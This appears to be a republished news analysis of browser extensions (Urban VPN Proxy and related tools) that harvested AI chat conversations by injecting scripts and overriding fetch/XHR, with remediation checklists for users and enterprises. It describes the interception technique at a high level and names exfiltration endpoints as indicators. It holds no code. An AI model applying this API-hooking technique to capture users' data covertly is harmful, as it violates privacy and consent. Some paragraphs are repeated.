Security researchers have exposed a family of seemingly benign Chrome and Edge extensions that quietly intercepted entire conversations with major AI chat services and forwarded those chats to remote analytics servers—an exposure that affects millions of users and raises urgent questions about marketplace review, extension permissions, and enterprise risk management.
Security firm Koi identified a set of extensions published by the same developer that—following an automatic update—began injecting platform-specific scripts into AI chat web pages to capture prompts, responses, timestamps and session metadata before forwarding that data to analytics endpoints. The behavior reportedly became active with a July 2025 update and was enabled by default, meaning most installed copies started harvesting data without a fresh, contextual consent prompt.
The most prominent names flagged in the analysis are Urban VPN Proxy, 1ClickVPN Proxy, Urban Browser Guard and Urban Ad Blocker across both the Chrome Web Store and Microsoft Edge Add-ons catalogues. Researchers and aggregated reporting place the combined install base in the multi‑million range—Urban VPN Proxy alone accounts for the lion’s share—producing a potential blast radius that is operationally significant for both consumers and organizations.
Two amplification factors make this especially dangerous:
Key causes of the review gap:
What remains less exhaustively documented in public reporting is the precise downstream commercialization chain: which named third parties (if any) purchased raw conversation logs, or the specific contracts that moved data from the analytics endpoint into buyer hands. The publisher’s privacy policy references sharing with an affiliated analytics firm (reported as BiScience in some materials), which supports plausible monetization hypotheses, but direct buyer receipts or purchase records were not published at the time of the reporting. Treat buyer claims as probable but requiring forensic confirmation.
Regulators may view undisclosed mass harvesting of conversational content as an unfair or deceptive practice, especially when the data contains health, financial or identifying information. The combination of deceptive marketing (privacy branding) and buried legal disclosures heightens the consumer‑protection risk. Enterprises may have contractual and compliance obligations if employee data was exposed.
Short term: uninstall the implicated extensions, rotate credentials and audit accounts. Medium term: enterprises must lock down extension policies and vendors must adopt runtime verification and stronger consent requirements. Without those changes, trust signals like “Featured” will continue to mislead, and the next mass‑harvest campaign will find the same holes to exploit.
Source: digit.in These Chrome and Edge browser extensions steal your AI chats, delete them now
Background
Security firm Koi identified a set of extensions published by the same developer that—following an automatic update—began injecting platform-specific scripts into AI chat web pages to capture prompts, responses, timestamps and session metadata before forwarding that data to analytics endpoints. The behavior reportedly became active with a July 2025 update and was enabled by default, meaning most installed copies started harvesting data without a fresh, contextual consent prompt.The most prominent names flagged in the analysis are Urban VPN Proxy, 1ClickVPN Proxy, Urban Browser Guard and Urban Ad Blocker across both the Chrome Web Store and Microsoft Edge Add-ons catalogues. Researchers and aggregated reporting place the combined install base in the multi‑million range—Urban VPN Proxy alone accounts for the lion’s share—producing a potential blast radius that is operationally significant for both consumers and organizations.
How the interception worked: a technical breakdown
Executor scripts and page-level injection
Rather than relying on ordinary network instrumentation, the flagged extensions deployed per‑platform executor scripts—small, targeted JavaScript modules that run only when a user opens a supported AI chat page. Those executors inject content scripts into the page context and hook into page internals. This allows them to observe and capture messages before they are encrypted for transport or after they are rendered, effectively bypassing the protections that server-side controls provide.API overriding and data capture
The injected scripts overrode core browser APIs such as fetch and XMLHttpRequest, intercepting outgoing prompts and incoming model outputs. The collected package reportedly included:- Every user prompt in plain text
- The full assistant response (model output)
- Conversation identifiers, timestamps and session metadata
- Page-specific model/platform identifiers and, in some cases, contextual cookies/localStorage state
Exfiltration and analytics endpoints
Captured data was compressed and transmitted to endpoints under the publisher’s control—named in reporting as analytics.urban‑vpn.com and stats.urban‑vpn.com—before any downstream handling. The telemetry Koi and others exposed shows these were active collection endpoints receiving harvested conversation packages.Scope and scale: why this matters
The combined install count for the flagged family exceeds several million installs across Chrome and Edge, with specific store listings showing multi‑hundreds-of-thousands to multi‑million users in some cases. Because the collection targeted multiple AI platforms—ChatGPT, Google Gemini, Anthropic Claude, Microsoft Copilot, Perplexity and others—a single infected profile could leak sensitive interactions across many services.Two amplification factors make this especially dangerous:
- Auto‑update propagation: Extensions update automatically by default. A runtime behavior change pushed by a developer can be delivered en masse without forced re‑consent, converting trust built over time into a surveillance conduit overnight.
- Client‑side access: AI assistants are often used for drafting, debugging, troubleshooting, or sharing credentials and API keys. Anything pasted into a conversation may have been captured verbatim. That materially increases the downstream risk of account takeover, corporate data leakage, or regulatory exposure.
What was collected — and the privacy stakes
The dataset described in the technical analysis is broad and sensitive:- Plain text prompts (user inputs)
- Model replies (assistant outputs)
- Session metadata (timestamps, conversation IDs)
- Model identifiers (which AI model was used)
- Potentially contextual site state (cookies, localStorage entries) depending on granted permissions
Marketplace failure: how did these extensions get Featured badges?
A deeply unsettling detail is that several of these extensions carried “Featured” badges in the official stores—signals users rely on as implicit trust marks. The presence of runtime-exfiltration logic undercuts the reliability of a static listing review process that checks manifests, UI assets and privacy policies without exercising extensions dynamically against popular web apps.Key causes of the review gap:
- Static review cannot easily detect code that only executes on specific domains (for example, ai.example.com) or of minified/obfuscated payloads that reveal behavior only at runtime.
- Auto‑update channels allow dramatic behavioral changes to be pushed after initial review without a store‑level forced re‑consent flow.
- Buried privacy‑policy language—while technically disclosure—fails to provide contextual, understandable consent at the time the behavior affects users.
What we can and cannot verify
The technical evidence that content was captured and exfiltrated to analytics endpoints is reproducible in multiple independent write‑ups and store‑artifact traces. The timeline—behavior introduced in a July 2025 update and enabled by default—is consistent across sources. Those core technical claims are strongly supported.What remains less exhaustively documented in public reporting is the precise downstream commercialization chain: which named third parties (if any) purchased raw conversation logs, or the specific contracts that moved data from the analytics endpoint into buyer hands. The publisher’s privacy policy references sharing with an affiliated analytics firm (reported as BiScience in some materials), which supports plausible monetization hypotheses, but direct buyer receipts or purchase records were not published at the time of the reporting. Treat buyer claims as probable but requiring forensic confirmation.
Immediate actions for users (prioritized)
If any of the named extensions are installed, take these steps now:- Uninstall the implicated extension(s) from every browser and profile on every device. Manual removal is the only sure way to stop the runtime behavior.
- Clear browser cookies, site data and localStorage for AI service domains you used while the extension was installed; sign out of the services and force session invalidation.
- Revoke and rotate any credentials, API keys or tokens you pasted into AI chats. Assume pasted secrets are compromised and issue replacements.
- Change passwords for accounts referenced in sensitive chats and enable multi‑factor authentication (MFA) everywhere possible.
- For consumer AI services, use the vendor’s data controls: delete chat history where available and disable any “Improve the model” or similar toggles.
Immediate actions for IT and security teams (enterprise checklist)
Enterprises should assume compromise for any employee who used AI chat tools while these extensions were installed and respond as follows:- Use enterprise browser controls to enforce a default‑deny extension posture (allowlist only vetted extensions). Chrome Enterprise and Microsoft Intune/GPO provide ExtensionInstallAllowlist and ExtensionInstallBlocklist policies.
- Audit endpoints for the identified extension IDs; remove occurrences and force remediation at scale. Koi published extension IDs and indicators useful for scanning.
- Hunt for outbound connections to the reported analytics endpoints (for example analytics.urban‑vpn.com / stats.urban‑vpn.com) using EDR, proxy logs and network telemetry.
- Rotate and revoke enterprise secrets that may have been disclosed in AI chats; treat exposed keys as compromised and reissue them.
- Issue immediate guidance to staff: prohibit pasting production credentials into consumer AI assistants and restrict unmanaged extensions on profiles used for sensitive work.
Regulatory and policy implications
If the exfiltration pipeline transferred raw conversational content to an external data broker for marketing analytics, that behavior would appear inconsistent with major store policies (for example Chrome’s Limited Use rules) which restrict transfers of user data to advertising platforms and data brokers without transparent constraints. Platform enforcement could include delisting, developer account suspension, audits or other penalties—but takedowns alone do not remediate already‑infected browsers.Regulators may view undisclosed mass harvesting of conversational content as an unfair or deceptive practice, especially when the data contains health, financial or identifying information. The combination of deceptive marketing (privacy branding) and buried legal disclosures heightens the consumer‑protection risk. Enterprises may have contractual and compliance obligations if employee data was exposed.
Marketplace and platform responsibilities: fixes that should be implemented
A set of practical platform reforms would materially reduce the likelihood of similar incidents:- Mandate runtime behavioral testing for high‑privilege extensions. Automated sandboxed simulations should exercise extensions against widely used web apps—including AI assistants—to detect page‑triggered injection and exfiltration.
- Require forced re‑consent flows at the store level whenever an extension pushes updates that materially change data‑collection behavior. Auto‑updates should not be a covert pathway for new surveillance features.
- Add transparency requirements for trust signals: disclose the rationale and last runtime re‑validation date for Featured/Trusted badges so users can evaluate the meaning of marketplace endorsements.
- Enforce stronger penalties and mandatory audits when large datasets of sensitive content are implicated, including independent verification of data deletion where appropriate.
Risk analysis: strengths of the evidence and open questions
What is strongly supported:- The presence of per‑platform executor scripts that hook into AI chat pages and override fetch/XHR appears in multiple independent technical write‑ups and store artifacts.
- The behavioral change tied to a July 2025 update and the broad install base of the implicated extensions are consistent across reporting.
- Precise evidence of named downstream buyers for harvested conversations—purchase receipts, contracts or buyer acknowledgements—has not been exhaustively documented publicly. The publisher’s privacy policy and affiliate links support plausible monetization, but forensic confirmation of buyers remains an investigatory gap. Treat claims of sales as probable but not fully proven until transactional artifacts are produced.
- This is a high severity event for consumers and enterprises because the captured asset is conversation content—the very thing users assume is private. The combination of client‑side access, auto‑update distribution, and multi‑service targeting makes the exposure durable and wide.
Practical recommendations for long‑term defense
- Treat browser extension governance as a first‑class security control. For organizations, that means default‑deny, allowlist only, and centralized management of extension inventories.
- Prefer open‑source or enterprise‑vetted extensions where possible; inspect code and maintain a small, curated extension catalog for employees who need specialized tools.
- Avoid pasting secrets into consumer AI assistants. Where AI is used for business purposes, adopt managed enterprise LLM services with contractual data protections and auditability.
- Advocate for platform changes: insist that marketplaces implement runtime testing, force re‑consent on behavior changes, and increase transparency for trust badges.
Conclusion
The discovery that widely distributed Chrome and Edge extensions—marketed as privacy and VPN tools—were harvesting full AI conversations exposes a new and immediate privacy frontier: client‑side code that is trusted by users but capable of siphoning the very content people share with AI assistants. The core technical findings are robust: per‑platform executor scripts captured prompts and replies and exfiltrated them to analytics endpoints after a default‑on update. The regulatory and remediation implications are severe and demand both immediate action from users and sustained reforms from browser marketplaces.Short term: uninstall the implicated extensions, rotate credentials and audit accounts. Medium term: enterprises must lock down extension policies and vendors must adopt runtime verification and stronger consent requirements. Without those changes, trust signals like “Featured” will continue to mislead, and the next mass‑harvest campaign will find the same holes to exploit.
Source: digit.in These Chrome and Edge browser extensions steal your AI chats, delete them now